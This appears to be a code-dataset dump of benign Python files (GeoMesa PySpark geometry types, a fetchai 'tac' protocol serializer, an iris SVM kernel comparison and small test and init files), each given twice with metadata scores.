return [_serialize_to_wkb(obj)]
def deserialize(self, datum):
return _deserialize_from_wkb(datum[0])
class PointUDT(ShapelyGeometryUDT):
pass
class LineStringUDT(ShapelyGeometryUDT):
pass
class PolygonUDT(ShapelyGeometryUDT):
pass
class MultiPointUDT(ShapelyGeometryUDT):
pass
class MultiLineStringUDT(ShapelyGeometryUDT):
pass
class MultiPolygonUDT(ShapelyGeometryUDT):
pass
class GeometryUDT(ShapelyGeometryUDT):
pass
class GeometryCollectionUDT(ShapelyGeometryUDT):
pass
def _serialize_to_wkb(data):
if isinstance(data, BaseGeometry):
return bytearray(data.wkb) # bytearray(...) needed for Python 2 compat.
return None
def _deserialize_from_wkb(data):
if data is None:
return None
return wkb.loads(bytes(data)) # bytes(...) needed for Python 2 compat.
_deserialize_from_wkb.__safe_for_unpickling__ = True
# inject some PySpark constructs into Shapely's geometry types
Point.__UDT__ = PointUDT()
MultiPoint.__UDT__ = MultiPointUDT()
LineString.__UDT__ = LineStringUDT()
MultiLineString.__UDT__ = MultiLineStringUDT()
Polygon.__UDT__ = PolygonUDT()
MultiPolygon.__UDT__ = MultiPolygonUDT()
BaseGeometry.__UDT__ = GeometryUDT()
GeometryCollection.__UDT__ = GeometryCollectionUDT()
|
<filename>geomesa-spark/geomesa_pyspark/src/main/python/geomesa_pyspark/types.py
from pyspark.sql.types import UserDefinedType, StructField, BinaryType, StructType
from shapely import wkb
from shapely.geometry import LineString, MultiLineString, MultiPoint, MultiPolygon, Point, Polygon
from shapely.geometry.base import BaseGeometry
from shapely.geometry.collection import GeometryCollection
class ShapelyGeometryUDT(UserDefinedType):
@classmethod
def sqlType(cls):
return StructType([StructField("wkb", BinaryType(), True)])
@classmethod
def module(cls):
return 'geomesa_pyspark.types'
@classmethod
def scalaUDT(cls):
return 'org.apache.spark.sql.jts.' + cls.__name__
def serialize(self, obj):
return [_serialize_to_wkb(obj)]
def deserialize(self, datum):
return _deserialize_from_wkb(datum[0])
class PointUDT(ShapelyGeometryUDT):
pass
class LineStringUDT(ShapelyGeometryUDT):
pass
class PolygonUDT(ShapelyGeometryUDT):
pass
class MultiPointUDT(ShapelyGeometryUDT):
pass
class MultiLineStringUDT(ShapelyGeometryUDT):
pass
class MultiPolygonUDT(ShapelyGeometryUDT):
pass
class GeometryUDT(ShapelyGeometryUDT):
pass
class GeometryCollectionUDT(ShapelyGeometryUDT):
pass
def _serialize_to_wkb(data):
if isinstance(data, BaseGeometry):
return bytearray(data.wkb) # bytearray(...) needed for Python 2 compat.
return None
def _deserialize_from_wkb(data):
if data is None:
return None
return wkb.loads(bytes(data)) # bytes(...) needed for Python 2 compat.
_deserialize_from_wkb.__safe_for_unpickling__ = True
# inject some PySpark constructs into Shapely's geometry types
Point.__UDT__ = PointUDT()
MultiPoint.__UDT__ = MultiPointUDT()
LineString.__UDT__ = LineStringUDT()
MultiLineString.__UDT__ = MultiLineStringUDT()
Polygon.__UDT__ = PolygonUDT()
MultiPolygon.__UDT__ = MultiPolygonUDT()
BaseGeometry.__UDT__ = GeometryUDT()
GeometryCollection.__UDT__ = GeometryCollectionUDT()
|
en
| 0.630305
|
# bytearray(...) needed for Python 2 compat. # bytes(...) needed for Python 2 compat. # inject some PySpark constructs into Shapely's geometry types
| 2.311213
| 2
|
packages/fetchai/protocols/tac/serialization.py
|
valory-xyz/agents-aea
| 28
|
6628142
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 fetchai
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Serialization module for tac protocol."""
# pylint: disable=too-many-statements,too-many-locals,no-member,too-few-public-methods,redefined-builtin
from typing import Any, Dict, cast
from aea.mail.base_pb2 import DialogueMessage
from aea.mail.base_pb2 import Message as ProtobufMessage
from aea.protocols.base import Message, Serializer
from packages.fetchai.protocols.tac import tac_pb2
from packages.fetchai.protocols.tac.custom_types import ErrorCode
from packages.fetchai.protocols.tac.message import TacMessage
class TacSerializer(Serializer):
"""Serialization for the 'tac' protocol."""
@staticmethod
def encode(msg: Message) -> bytes:
"""
Encode a 'Tac' message into bytes.
:param msg: the message object.
:return: the bytes.
"""
msg = cast(TacMessage, msg)
message_pb = ProtobufMessage()
dialogue_message_pb = DialogueMessage()
tac_msg = tac_pb2.TacMessage()
dialogue_message_pb.message_id = msg.message_id
dialogue_reference = msg.dialogue_reference
dialogue_message_pb.dialogue_starter_reference = dialogue_reference[0]
dialogue_message_pb.dialogue_responder_reference = dialogue_reference[1]
dialogue_message_pb.target = msg.target
performative_id = msg.performative
if performative_id == TacMessage.Performative.REGISTER:
performative = tac_pb2.TacMessage.Register_Performative() # type: ignore
agent_name = msg.agent_name
performative.agent_name = agent_name
tac_msg.register.CopyFrom(performative)
elif performative_id == TacMessage.Performative.UNREGISTER:
performative = tac_pb2.TacMessage.Unregister_Performative() # type: ignore
tac_msg.unregister.CopyFrom(performative)
elif performative_id == TacMessage.Performative.TRANSACTION:
performative = tac_pb2.TacMessage.Transaction_Performative() # type: ignore
transaction_id = msg.transaction_id
performative.transaction_id = transaction_id
ledger_id = msg.ledger_id
performative.ledger_id = ledger_id
sender_address = msg.sender_address
performative.sender_address = sender_address
counterparty_address = msg.counterparty_address
performative.counterparty_address = counterparty_address
amount_by_currency_id = msg.amount_by_currency_id
performative.amount_by_currency_id.update(amount_by_currency_id)
fee_by_currency_id = msg.fee_by_currency_id
performative.fee_by_currency_id.update(fee_by_currency_id)
quantities_by_good_id = msg.quantities_by_good_id
performative.quantities_by_good_id.update(quantities_by_good_id)
nonce = msg.nonce
performative.nonce = nonce
sender_signature = msg.sender_signature
performative.sender_signature = sender_signature
counterparty_signature = msg.counterparty_signature
performative.counterparty_signature = counterparty_signature
tac_msg.transaction.CopyFrom(performative)
elif performative_id == TacMessage.Performative.CANCELLED:
performative = tac_pb2.TacMessage.Cancelled_Performative() # type: ignore
tac_msg.cancelled.CopyFrom(performative)
elif performative_id == TacMessage.Performative.GAME_DATA:
performative = tac_pb2.TacMessage.Game_Data_Performative() # type: ignore
amount_by_currency_id = msg.amount_by_currency_id
performative.amount_by_currency_id.update(amount_by_currency_id)
exchange_params_by_currency_id = msg.exchange_params_by_currency_id
performative.exchange_params_by_currency_id.update(
exchange_params_by_currency_id
)
quantities_by_good_id = msg.quantities_by_good_id
performative.quantities_by_good_id.update(quantities_by_good_id)
utility_params_by_good_id = msg.utility_params_by_good_id
performative.utility_params_by_good_id.update(utility_params_by_good_id)
fee_by_currency_id = msg.fee_by_currency_id
performative.fee_by_currency_id.update(fee_by_currency_id)
agent_addr_to_name = msg.agent_addr_to_name
performative.agent_addr_to_name.update(agent_addr_to_name)
currency_id_to_name = msg.currency_id_to_name
performative.currency_id_to_name.update(currency_id_to_name)
good_id_to_name = msg.good_id_to_name
performative.good_id_to_name.update(good_id_to_name)
version_id = msg.version_id
performative.version_id = version_id
if msg.is_set("info"):
performative.info_is_set = True
info = msg.info
performative.info.update(info)
tac_msg.game_data.CopyFrom(performative)
elif performative_id == TacMessage.Performative.TRANSACTION_CONFIRMATION:
performative = tac_pb2.TacMessage.Transaction_Confirmation_Performative() # type: ignore
transaction_id = msg.transaction_id
performative.transaction_id = transaction_id
amount_by_currency_id = msg.amount_by_currency_id
performative.amount_by_currency_id.update(amount_by_currency_id)
quantities_by_good_id = msg.quantities_by_good_id
performative.quantities_by_good_id.update(quantities_by_good_id)
tac_msg.transaction_confirmation.CopyFrom(performative)
elif performative_id == TacMessage.Performative.TAC_ERROR:
performative = tac_pb2.TacMessage.Tac_Error_Performative() # type: ignore
error_code = msg.error_code
ErrorCode.encode(performative.error_code, error_code)
if msg.is_set("info"):
performative.info_is_set = True
info = msg.info
performative.info.update(info)
tac_msg.tac_error.CopyFrom(performative)
else:
raise ValueError("Performative not valid: {}".format(performative_id))
dialogue_message_pb.content = tac_msg.SerializeToString()
message_pb.dialogue_message.CopyFrom(dialogue_message_pb)
message_bytes = message_pb.SerializeToString()
return message_bytes
@staticmethod
def decode(obj: bytes) -> Message:
"""
Decode bytes into a 'Tac' message.
:param obj: the bytes object.
:return: the 'Tac' message.
"""
message_pb = ProtobufMessage()
tac_pb = tac_pb2.TacMessage()
message_pb.ParseFromString(obj)
message_id = message_pb.dialogue_message.message_id
dialogue_reference = (
message_pb.dialogue_message.dialogue_starter_reference,
message_pb.dialogue_message.dialogue_responder_reference,
)
target = message_pb.dialogue_message.target
tac_pb.ParseFromString(message_pb.dialogue_message.content)
performative = tac_pb.WhichOneof("performative")
performative_id = TacMessage.Performative(str(performative))
performative_content = dict() # type: Dict[str, Any]
if performative_id == TacMessage.Performative.REGISTER:
agent_name = tac_pb.register.agent_name
performative_content["agent_name"] = agent_name
elif performative_id == TacMessage.Performative.UNREGISTER:
pass
elif performative_id == TacMessage.Performative.TRANSACTION:
transaction_id = tac_pb.transaction.transaction_id
performative_content["transaction_id"] = transaction_id
ledger_id = tac_pb.transaction.ledger_id
performative_content["ledger_id"] = ledger_id
sender_address = tac_pb.transaction.sender_address
performative_content["sender_address"] = sender_address
counterparty_address = tac_pb.transaction.counterparty_address
performative_content["counterparty_address"] = counterparty_address
amount_by_currency_id = tac_pb.transaction.amount_by_currency_id
amount_by_currency_id_dict = dict(amount_by_currency_id)
performative_content["amount_by_currency_id"] = amount_by_currency_id_dict
fee_by_currency_id = tac_pb.transaction.fee_by_currency_id
fee_by_currency_id_dict = dict(fee_by_currency_id)
performative_content["fee_by_currency_id"] = fee_by_currency_id_dict
quantities_by_good_id = tac_pb.transaction.quantities_by_good_id
quantities_by_good_id_dict = dict(quantities_by_good_id)
performative_content["quantities_by_good_id"] = quantities_by_good_id_dict
nonce = tac_pb.transaction.nonce
performative_content["nonce"] = nonce
sender_signature = tac_pb.transaction.sender_signature
performative_content["sender_signature"] = sender_signature
counterparty_signature = tac_pb.transaction.counterparty_signature
performative_content["counterparty_signature"] = counterparty_signature
elif performative_id == TacMessage.Performative.CANCELLED:
pass
elif performative_id == TacMessage.Performative.GAME_DATA:
amount_by_currency_id = tac_pb.game_data.amount_by_currency_id
amount_by_currency_id_dict = dict(amount_by_currency_id)
performative_content["amount_by_currency_id"] = amount_by_currency_id_dict
exchange_params_by_currency_id = (
tac_pb.game_data.exchange_params_by_currency_id
)
exchange_params_by_currency_id_dict = dict(exchange_params_by_currency_id)
performative_content[
"exchange_params_by_currency_id"
] = exchange_params_by_currency_id_dict
quantities_by_good_id = tac_pb.game_data.quantities_by_good_id
quantities_by_good_id_dict = dict(quantities_by_good_id)
performative_content["quantities_by_good_id"] = quantities_by_good_id_dict
utility_params_by_good_id = tac_pb.game_data.utility_params_by_good_id
utility_params_by_good_id_dict = dict(utility_params_by_good_id)
performative_content[
"utility_params_by_good_id"
] = utility_params_by_good_id_dict
fee_by_currency_id = tac_pb.game_data.fee_by_currency_id
fee_by_currency_id_dict = dict(fee_by_currency_id)
performative_content["fee_by_currency_id"] = fee_by_currency_id_dict
agent_addr_to_name = tac_pb.game_data.agent_addr_to_name
agent_addr_to_name_dict = dict(agent_addr_to_name)
performative_content["agent_addr_to_name"] = agent_addr_to_name_dict
currency_id_to_name = tac_pb.game_data.currency_id_to_name
currency_id_to_name_dict = dict(currency_id_to_name)
performative_content["currency_id_to_name"] = currency_id_to_name_dict
good_id_to_name = tac_pb.game_data.good_id_to_name
good_id_to_name_dict = dict(good_id_to_name)
performative_content["good_id_to_name"] = good_id_to_name_dict
version_id = tac_pb.game_data.version_id
performative_content["version_id"] = version_id
if tac_pb.game_data.info_is_set:
info = tac_pb.game_data.info
info_dict = dict(info)
performative_content["info"] = info_dict
elif performative_id == TacMessage.Performative.TRANSACTION_CONFIRMATION:
transaction_id = tac_pb.transaction_confirmation.transaction_id
performative_content["transaction_id"] = transaction_id
amount_by_currency_id = (
tac_pb.transaction_confirmation.amount_by_currency_id
)
amount_by_currency_id_dict = dict(amount_by_currency_id)
performative_content["amount_by_currency_id"] = amount_by_currency_id_dict
quantities_by_good_id = (
tac_pb.transaction_confirmation.quantities_by_good_id
)
quantities_by_good_id_dict = dict(quantities_by_good_id)
performative_content["quantities_by_good_id"] = quantities_by_good_id_dict
elif performative_id == TacMessage.Performative.TAC_ERROR:
pb2_error_code = tac_pb.tac_error.error_code
error_code = ErrorCode.decode(pb2_error_code)
performative_content["error_code"] = error_code
if tac_pb.tac_error.info_is_set:
info = tac_pb.tac_error.info
info_dict = dict(info)
performative_content["info"] = info_dict
else:
raise ValueError("Performative not valid: {}.".format(performative_id))
return TacMessage(
message_id=message_id,
dialogue_reference=dialogue_reference,
target=target,
performative=performative,
**performative_content
)
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 fetchai
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Serialization module for tac protocol."""
# pylint: disable=too-many-statements,too-many-locals,no-member,too-few-public-methods,redefined-builtin
from typing import Any, Dict, cast
from aea.mail.base_pb2 import DialogueMessage
from aea.mail.base_pb2 import Message as ProtobufMessage
from aea.protocols.base import Message, Serializer
from packages.fetchai.protocols.tac import tac_pb2
from packages.fetchai.protocols.tac.custom_types import ErrorCode
from packages.fetchai.protocols.tac.message import TacMessage
class TacSerializer(Serializer):
"""Serialization for the 'tac' protocol."""
@staticmethod
def encode(msg: Message) -> bytes:
"""
Encode a 'Tac' message into bytes.
:param msg: the message object.
:return: the bytes.
"""
msg = cast(TacMessage, msg)
message_pb = ProtobufMessage()
dialogue_message_pb = DialogueMessage()
tac_msg = tac_pb2.TacMessage()
dialogue_message_pb.message_id = msg.message_id
dialogue_reference = msg.dialogue_reference
dialogue_message_pb.dialogue_starter_reference = dialogue_reference[0]
dialogue_message_pb.dialogue_responder_reference = dialogue_reference[1]
dialogue_message_pb.target = msg.target
performative_id = msg.performative
if performative_id == TacMessage.Performative.REGISTER:
performative = tac_pb2.TacMessage.Register_Performative() # type: ignore
agent_name = msg.agent_name
performative.agent_name = agent_name
tac_msg.register.CopyFrom(performative)
elif performative_id == TacMessage.Performative.UNREGISTER:
performative = tac_pb2.TacMessage.Unregister_Performative() # type: ignore
tac_msg.unregister.CopyFrom(performative)
elif performative_id == TacMessage.Performative.TRANSACTION:
performative = tac_pb2.TacMessage.Transaction_Performative() # type: ignore
transaction_id = msg.transaction_id
performative.transaction_id = transaction_id
ledger_id = msg.ledger_id
performative.ledger_id = ledger_id
sender_address = msg.sender_address
performative.sender_address = sender_address
counterparty_address = msg.counterparty_address
performative.counterparty_address = counterparty_address
amount_by_currency_id = msg.amount_by_currency_id
performative.amount_by_currency_id.update(amount_by_currency_id)
fee_by_currency_id = msg.fee_by_currency_id
performative.fee_by_currency_id.update(fee_by_currency_id)
quantities_by_good_id = msg.quantities_by_good_id
performative.quantities_by_good_id.update(quantities_by_good_id)
nonce = msg.nonce
performative.nonce = nonce
sender_signature = msg.sender_signature
performative.sender_signature = sender_signature
counterparty_signature = msg.counterparty_signature
performative.counterparty_signature = counterparty_signature
tac_msg.transaction.CopyFrom(performative)
elif performative_id == TacMessage.Performative.CANCELLED:
performative = tac_pb2.TacMessage.Cancelled_Performative() # type: ignore
tac_msg.cancelled.CopyFrom(performative)
elif performative_id == TacMessage.Performative.GAME_DATA:
performative = tac_pb2.TacMessage.Game_Data_Performative() # type: ignore
amount_by_currency_id = msg.amount_by_currency_id
performative.amount_by_currency_id.update(amount_by_currency_id)
exchange_params_by_currency_id = msg.exchange_params_by_currency_id
performative.exchange_params_by_currency_id.update(
exchange_params_by_currency_id
)
quantities_by_good_id = msg.quantities_by_good_id
performative.quantities_by_good_id.update(quantities_by_good_id)
utility_params_by_good_id = msg.utility_params_by_good_id
performative.utility_params_by_good_id.update(utility_params_by_good_id)
fee_by_currency_id = msg.fee_by_currency_id
performative.fee_by_currency_id.update(fee_by_currency_id)
agent_addr_to_name = msg.agent_addr_to_name
performative.agent_addr_to_name.update(agent_addr_to_name)
currency_id_to_name = msg.currency_id_to_name
performative.currency_id_to_name.update(currency_id_to_name)
good_id_to_name = msg.good_id_to_name
performative.good_id_to_name.update(good_id_to_name)
version_id = msg.version_id
performative.version_id = version_id
if msg.is_set("info"):
performative.info_is_set = True
info = msg.info
performative.info.update(info)
tac_msg.game_data.CopyFrom(performative)
elif performative_id == TacMessage.Performative.TRANSACTION_CONFIRMATION:
performative = tac_pb2.TacMessage.Transaction_Confirmation_Performative() # type: ignore
transaction_id = msg.transaction_id
performative.transaction_id = transaction_id
amount_by_currency_id = msg.amount_by_currency_id
performative.amount_by_currency_id.update(amount_by_currency_id)
quantities_by_good_id = msg.quantities_by_good_id
performative.quantities_by_good_id.update(quantities_by_good_id)
tac_msg.transaction_confirmation.CopyFrom(performative)
elif performative_id == TacMessage.Performative.TAC_ERROR:
performative = tac_pb2.TacMessage.Tac_Error_Performative() # type: ignore
error_code = msg.error_code
ErrorCode.encode(performative.error_code, error_code)
if msg.is_set("info"):
performative.info_is_set = True
info = msg.info
performative.info.update(info)
tac_msg.tac_error.CopyFrom(performative)
else:
raise ValueError("Performative not valid: {}".format(performative_id))
dialogue_message_pb.content = tac_msg.SerializeToString()
message_pb.dialogue_message.CopyFrom(dialogue_message_pb)
message_bytes = message_pb.SerializeToString()
return message_bytes
@staticmethod
def decode(obj: bytes) -> Message:
"""
Decode bytes into a 'Tac' message.
:param obj: the bytes object.
:return: the 'Tac' message.
"""
message_pb = ProtobufMessage()
tac_pb = tac_pb2.TacMessage()
message_pb.ParseFromString(obj)
message_id = message_pb.dialogue_message.message_id
dialogue_reference = (
message_pb.dialogue_message.dialogue_starter_reference,
message_pb.dialogue_message.dialogue_responder_reference,
)
target = message_pb.dialogue_message.target
tac_pb.ParseFromString(message_pb.dialogue_message.content)
performative = tac_pb.WhichOneof("performative")
performative_id = TacMessage.Performative(str(performative))
performative_content = dict() # type: Dict[str, Any]
if performative_id == TacMessage.Performative.REGISTER:
agent_name = tac_pb.register.agent_name
performative_content["agent_name"] = agent_name
elif performative_id == TacMessage.Performative.UNREGISTER:
pass
elif performative_id == TacMessage.Performative.TRANSACTION:
transaction_id = tac_pb.transaction.transaction_id
performative_content["transaction_id"] = transaction_id
ledger_id = tac_pb.transaction.ledger_id
performative_content["ledger_id"] = ledger_id
sender_address = tac_pb.transaction.sender_address
performative_content["sender_address"] = sender_address
counterparty_address = tac_pb.transaction.counterparty_address
performative_content["counterparty_address"] = counterparty_address
amount_by_currency_id = tac_pb.transaction.amount_by_currency_id
amount_by_currency_id_dict = dict(amount_by_currency_id)
performative_content["amount_by_currency_id"] = amount_by_currency_id_dict
fee_by_currency_id = tac_pb.transaction.fee_by_currency_id
fee_by_currency_id_dict = dict(fee_by_currency_id)
performative_content["fee_by_currency_id"] = fee_by_currency_id_dict
quantities_by_good_id = tac_pb.transaction.quantities_by_good_id
quantities_by_good_id_dict = dict(quantities_by_good_id)
performative_content["quantities_by_good_id"] = quantities_by_good_id_dict
nonce = tac_pb.transaction.nonce
performative_content["nonce"] = nonce
sender_signature = tac_pb.transaction.sender_signature
performative_content["sender_signature"] = sender_signature
counterparty_signature = tac_pb.transaction.counterparty_signature
performative_content["counterparty_signature"] = counterparty_signature
elif performative_id == TacMessage.Performative.CANCELLED:
pass
elif performative_id == TacMessage.Performative.GAME_DATA:
amount_by_currency_id = tac_pb.game_data.amount_by_currency_id
amount_by_currency_id_dict = dict(amount_by_currency_id)
performative_content["amount_by_currency_id"] = amount_by_currency_id_dict
exchange_params_by_currency_id = (
tac_pb.game_data.exchange_params_by_currency_id
)
exchange_params_by_currency_id_dict = dict(exchange_params_by_currency_id)
performative_content[
"exchange_params_by_currency_id"
] = exchange_params_by_currency_id_dict
quantities_by_good_id = tac_pb.game_data.quantities_by_good_id
quantities_by_good_id_dict = dict(quantities_by_good_id)
performative_content["quantities_by_good_id"] = quantities_by_good_id_dict
utility_params_by_good_id = tac_pb.game_data.utility_params_by_good_id
utility_params_by_good_id_dict = dict(utility_params_by_good_id)
performative_content[
"utility_params_by_good_id"
] = utility_params_by_good_id_dict
fee_by_currency_id = tac_pb.game_data.fee_by_currency_id
fee_by_currency_id_dict = dict(fee_by_currency_id)
performative_content["fee_by_currency_id"] = fee_by_currency_id_dict
agent_addr_to_name = tac_pb.game_data.agent_addr_to_name
agent_addr_to_name_dict = dict(agent_addr_to_name)
performative_content["agent_addr_to_name"] = agent_addr_to_name_dict
currency_id_to_name = tac_pb.game_data.currency_id_to_name
currency_id_to_name_dict = dict(currency_id_to_name)
performative_content["currency_id_to_name"] = currency_id_to_name_dict
good_id_to_name = tac_pb.game_data.good_id_to_name
good_id_to_name_dict = dict(good_id_to_name)
performative_content["good_id_to_name"] = good_id_to_name_dict
version_id = tac_pb.game_data.version_id
performative_content["version_id"] = version_id
if tac_pb.game_data.info_is_set:
info = tac_pb.game_data.info
info_dict = dict(info)
performative_content["info"] = info_dict
elif performative_id == TacMessage.Performative.TRANSACTION_CONFIRMATION:
transaction_id = tac_pb.transaction_confirmation.transaction_id
performative_content["transaction_id"] = transaction_id
amount_by_currency_id = (
tac_pb.transaction_confirmation.amount_by_currency_id
)
amount_by_currency_id_dict = dict(amount_by_currency_id)
performative_content["amount_by_currency_id"] = amount_by_currency_id_dict
quantities_by_good_id = (
tac_pb.transaction_confirmation.quantities_by_good_id
)
quantities_by_good_id_dict = dict(quantities_by_good_id)
performative_content["quantities_by_good_id"] = quantities_by_good_id_dict
elif performative_id == TacMessage.Performative.TAC_ERROR:
pb2_error_code = tac_pb.tac_error.error_code
error_code = ErrorCode.decode(pb2_error_code)
performative_content["error_code"] = error_code
if tac_pb.tac_error.info_is_set:
info = tac_pb.tac_error.info
info_dict = dict(info)
performative_content["info"] = info_dict
else:
raise ValueError("Performative not valid: {}.".format(performative_id))
return TacMessage(
message_id=message_id,
dialogue_reference=dialogue_reference,
target=target,
performative=performative,
**performative_content
)
|
en
| 0.633095
|
# -*- coding: utf-8 -*- # ------------------------------------------------------------------------------ # # Copyright 2022 fetchai # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ------------------------------------------------------------------------------ Serialization module for tac protocol. # pylint: disable=too-many-statements,too-many-locals,no-member,too-few-public-methods,redefined-builtin Serialization for the 'tac' protocol. Encode a 'Tac' message into bytes. :param msg: the message object. :return: the bytes. # type: ignore # type: ignore # type: ignore # type: ignore # type: ignore # type: ignore # type: ignore Decode bytes into a 'Tac' message. :param obj: the bytes object. :return: the 'Tac' message. # type: Dict[str, Any]
| 1.555065
| 2
|
Assignment2(SVM)/SVM.py
|
jack17529/MLPR
| 0
|
6628143
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn import svm
from sklearn.metrics import accuracy_score
from matplotlib import pyplot as plt
#from sklearn import cross_validation
# get the data
iris = load_iris()
data0 = iris.data
labels0 = iris.target
(n,p) = data0.shape
#train test split.
xtrain,xtest,ytrain,ytest = train_test_split(data0,labels0,test_size=0.3, random_state=21)
# rbf kernel.
rbfn = svm.SVC(C=10,kernel='rbf',gamma=0.001)
rbfn.fit(xtrain,ytrain)
pred_rbf=rbfn.predict(xtest)
acc_rbf = accuracy_score(ytest, pred_rbf)
print("Accuracy Score of Kernel=rbf is ",acc_rbf)
# poly kernel
quad = svm.SVC(C=10.0,kernel='poly',degree=2,gamma='auto')
quad.fit(xtrain,ytrain)
pred_quad=quad.predict(xtest)
acc_quad=accuracy_score(ytest,pred_quad)
print("Accuracy Score of Kernel=poly is ",acc_quad)
# sigmoid kernel
sigm = svm.SVC(C=10.0, kernel='sigmoid', gamma=0.001)
sigm.fit(xtrain, ytrain)
pred_sigmoid = sigm.predict(xtest)
acc_sigmoid = accuracy_score(ytest, pred_sigmoid)
print("Accuracy Score of Kernel=sigmoid is ",acc_sigmoid)
#plotting graph
results = []
results.append(accuracy_score(ytest, pred_rbf))
results.append(accuracy_score(ytest, pred_quad))
results.append(accuracy_score(ytest, pred_sigmoid))
label = ['rbf','quad','sigmoid']
index = np.arange(len(label))
plt.bar(index, results)
plt.xticks(index, label, fontsize=20, rotation=30)
plt.show()
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn import svm
from sklearn.metrics import accuracy_score
from matplotlib import pyplot as plt
#from sklearn import cross_validation
# get the data
iris = load_iris()
data0 = iris.data
labels0 = iris.target
(n,p) = data0.shape
#train test split.
xtrain,xtest,ytrain,ytest = train_test_split(data0,labels0,test_size=0.3, random_state=21)
# rbf kernel.
rbfn = svm.SVC(C=10,kernel='rbf',gamma=0.001)
rbfn.fit(xtrain,ytrain)
pred_rbf=rbfn.predict(xtest)
acc_rbf = accuracy_score(ytest, pred_rbf)
print("Accuracy Score of Kernel=rbf is ",acc_rbf)
# poly kernel
quad = svm.SVC(C=10.0,kernel='poly',degree=2,gamma='auto')
quad.fit(xtrain,ytrain)
pred_quad=quad.predict(xtest)
acc_quad=accuracy_score(ytest,pred_quad)
print("Accuracy Score of Kernel=poly is ",acc_quad)
# sigmoid kernel
sigm = svm.SVC(C=10.0, kernel='sigmoid', gamma=0.001)
sigm.fit(xtrain, ytrain)
pred_sigmoid = sigm.predict(xtest)
acc_sigmoid = accuracy_score(ytest, pred_sigmoid)
print("Accuracy Score of Kernel=sigmoid is ",acc_sigmoid)
#plotting graph
results = []
results.append(accuracy_score(ytest, pred_rbf))
results.append(accuracy_score(ytest, pred_quad))
results.append(accuracy_score(ytest, pred_sigmoid))
label = ['rbf','quad','sigmoid']
index = np.arange(len(label))
plt.bar(index, results)
plt.xticks(index, label, fontsize=20, rotation=30)
plt.show()
|
en
| 0.567882
|
# -*- coding: utf-8 -*- Spyder Editor
This is a temporary script file. #from sklearn import cross_validation # get the data #train test split. # rbf kernel. # poly kernel # sigmoid kernel #plotting graph
| 2.830404
| 3
|
test/test_whwreader.py
|
mtwharmby/whweather-reader
| 0
|
6628144
|
import pytest
import whwreader.whwreader as whwreader
from whwreader.whwreader import Reading
def test_transform():
#Preamble
whwreader.__sensor_time_offset['boris'] = 0
whwreader.__sensor_time_offset['charles'] = 1546804623.6360931
sensor_reading = "name=boris::time=2134457::temp=25.5::humid=56.8"
#expected = Reading('boris', 2134.457, readings={'temp': 25.5, 'humid': 56.8}, sensor_unknown=False)
expected = Reading('boris', 2134.457, {'temp': 25.5, 'humid': 56.8}, sensor_unknown=False)
structured_read = whwreader.transform_reading(sensor_reading)
assert structured_read == expected
#Now test against an offset time. N.B. Expecting time in ms
sensor_reading_2 = "name=charles::time=600::temp=32.5::humid=22.6"
expected_2 = Reading('charles', 1546804623.6360931 + 0.6, readings={'temp': 32.5, 'humid': 22.6})
structured_read = whwreader.transform_reading(sensor_reading_2)
assert structured_read == expected_2
|
import pytest
import whwreader.whwreader as whwreader
from whwreader.whwreader import Reading
def test_transform():
#Preamble
whwreader.__sensor_time_offset['boris'] = 0
whwreader.__sensor_time_offset['charles'] = 1546804623.6360931
sensor_reading = "name=boris::time=2134457::temp=25.5::humid=56.8"
#expected = Reading('boris', 2134.457, readings={'temp': 25.5, 'humid': 56.8}, sensor_unknown=False)
expected = Reading('boris', 2134.457, {'temp': 25.5, 'humid': 56.8}, sensor_unknown=False)
structured_read = whwreader.transform_reading(sensor_reading)
assert structured_read == expected
#Now test against an offset time. N.B. Expecting time in ms
sensor_reading_2 = "name=charles::time=600::temp=32.5::humid=22.6"
expected_2 = Reading('charles', 1546804623.6360931 + 0.6, readings={'temp': 32.5, 'humid': 22.6})
structured_read = whwreader.transform_reading(sensor_reading_2)
assert structured_read == expected_2
|
en
| 0.656804
|
#Preamble #expected = Reading('boris', 2134.457, readings={'temp': 25.5, 'humid': 56.8}, sensor_unknown=False) #Now test against an offset time. N.B. Expecting time in ms
| 2.411141
| 2
|
SimPEG/potential_fields/__init__.py
|
Prithwijit-Chak/simpeg
| 358
|
6628145
|
from __future__ import absolute_import
from . import magnetics
from . import gravity
from .base import get_dist_wgt
|
from __future__ import absolute_import
from . import magnetics
from . import gravity
from .base import get_dist_wgt
|
none
| 1
| 1.104267
| 1
|
|
tests/test_builders.py
|
martinRenou/robotkernel
| 56
|
6628146
|
# -*- coding: utf-8 -*-
from robotkernel.builders import build_suite
TEST_SUITE = """\
*** Settings ***
Library Collections
*** Keywords ***
Head
[Arguments] ${list}
${value}= Get from list ${list} 0
[Return] ${value}
*** Tasks ***
Get head
${array}= Create list 1 2 3 4 5
${head}= Head ${array}
Should be equal ${head} 1
"""
def test_string():
suite = build_suite(TEST_SUITE, {})
assert len(suite.resource.keywords) == 1
assert len(suite.tests) == 1
|
# -*- coding: utf-8 -*-
